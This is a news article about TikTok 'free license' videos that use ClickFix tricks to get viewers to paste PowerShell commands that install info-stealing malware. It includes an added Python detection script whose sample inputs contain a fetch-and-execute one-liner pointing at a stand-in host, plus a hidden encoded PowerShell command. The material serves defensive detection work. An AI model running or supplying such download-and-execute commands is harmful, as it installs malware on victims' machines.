This TikTok Scam Promises You a Free Photoshop or Windows License – and Then Steals Your Info
If you see a TikTok 'tech tip' telling you to paste code, it's likely a scam. But what exactly is happening behind the scenes?
TikTok has become a popular platform for spreading information-stealing malware and other payloads, with free software acting as the bait. On October 17, Senior ISC Handler Xavier Mertens warned about the rise of these attacks in a post published on the SANS Institute's Internet Storm Center website. The wave of attacks leverages ClickFix social engineering techniques to dupe victims into downloading malware onto their systems.
According to Mertens, the scams often use ClickFix tactics, which involve providing step-by-step instructions that trick users into "hacking" themselves. These instructions might include using a Windows shortcut and copy-pasting a snippet of code into a command prompt to trigger a PowerShell script. The goal is to bypass traditional anti-phishing protections and open up the device for exploitation.
In one example, a scammer posted content on TikTok – with over 500 likes – that claimed to provide an easy way to activate Photoshop for free. The victim was asked to start PowerShell as an administrator and trigger one line of code, which then executed "Updater.exe," a Trojan designed to steal credentials and system information. An additional shellcode was also launched in memory.
ZDNET explored TikTok for similar videos and found that many were live. For example, in the screenshot below, the author was promoting a fake way to download and install Adobe Photoshop without the need for a license. Other examples we found included fake, free ways to license Microsoft Windows.

ClickFix is a particularly nasty social engineering technique that tries to bypass traditional anti-phishing protections by tricking users into "hacking" themselves. These tactics are laid out in a way that is easy to understand and are given a fake purpose – such as for fixing a minor technical glitch, using paid software for free, or as a "life hack" for improving popular streaming services.
Once the victim has unwittingly opened up their device for exploitation, a malicious payload is deployed and executed. The malware recorded in ClickFix campaigns includes information stealers, Remote Access Trojans (RATs), ransomware, and worms.
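For defenders, the pasted one-liner described above can be triaged from PowerShell logs. The following is an added example, not code from ZDNET, SANS, or any vendor named in this article; the sample lines, the `example.invalid` URLs, and the `triage` function name are constructed for illustration.

```python
import re

# Cmdlets, aliases and .NET methods that pull content from a remote host.
FETCH = re.compile(
    r"\b(invoke-webrequest|invoke-restmethod|iwr|irm|curl|wget|start-bitstransfer)\b"
    r"|download(string|file|data)", re.I)
# Primitives that run what was just fetched.
EXEC = re.compile(r"\b(invoke-expression|iex|start-process)\b", re.I)
# -EncodedCommand and its common abbreviations followed by a base64 blob.
ENCODED = re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I)
HIDDEN = re.compile(r"\s-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)
URL = re.compile(r"https?://[^\s'\"()]+", re.I)


def triage(script_text: str) -> dict:
    """Score one logged PowerShell script block or command line."""
    reasons = []
    if FETCH.search(script_text) and EXEC.search(script_text):
        reasons.append("remote fetch combined with execution")
    if ENCODED.search(script_text):
        reasons.append("encoded command")
    suspicious = bool(reasons)
    if suspicious and HIDDEN.search(script_text):
        reasons.append("hidden window")
    return {"suspicious": suspicious, "reasons": reasons,
            "urls": URL.findall(script_text)}


# Constructed sample records (not taken from the article). A line pasted into
# an already-open PowerShell window never appears in a process command line,
# so the text to inspect comes from script block logging (event ID 4104).
SAMPLES = [
    "iex (irm https://example.invalid/photoshop)",
    "Get-ChildItem C:\\Users -Recurse | Measure-Object",
    "Invoke-WebRequest https://example.invalid/tool.zip -OutFile tool.zip",
    "powershell -w hidden -enc QUFBQUFBQUFBQUFBQUFBQQ==",
]

if __name__ == "__main__":
    for text in SAMPLES:
        result = triage(text)
        verdict = "ALERT" if result["suspicious"] else "ok"
        print(f"{verdict:5} {text}\n      {result['reasons']} {result['urls']}")
```

A plain download with no execution step is deliberately left unflagged to keep the heuristic quiet on routine admin activity; treat any hit as a lead to investigate, not a verdict.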
This is not the first time TikTok and ClickFix have been linked. In March, cybersecurity researchers from Trend Micro reported that TikTok videos, potentially generated through AI tools, were being distributed on the platform to spread Vidar and StealC information stealers. A network of faceless accounts posted videos on topics including improving Spotify and included step-by-step instructions that launched a PowerShell command to load malware.
"The vast user base and algorithmic reach of social media platforms provide an ideal delivery mechanism for threat actors," the researchers noted. "For attackers, this means broad distribution without the logistical burden of maintaining an infrastructure."
Earlier this month, Microsoft warned that ClickFix is becoming increasingly popular as a method of infiltrating networks, stealing data, and deploying malware. In the Redmond giant's latest Digital Defense report, Microsoft said that since 2024, ClickFix tactics have been recorded as a method of initial access in 47% of attacks, ahead of phishing and password "spray and pray" attack methods.
How to Protect Yourself Against ClickFix Attacks?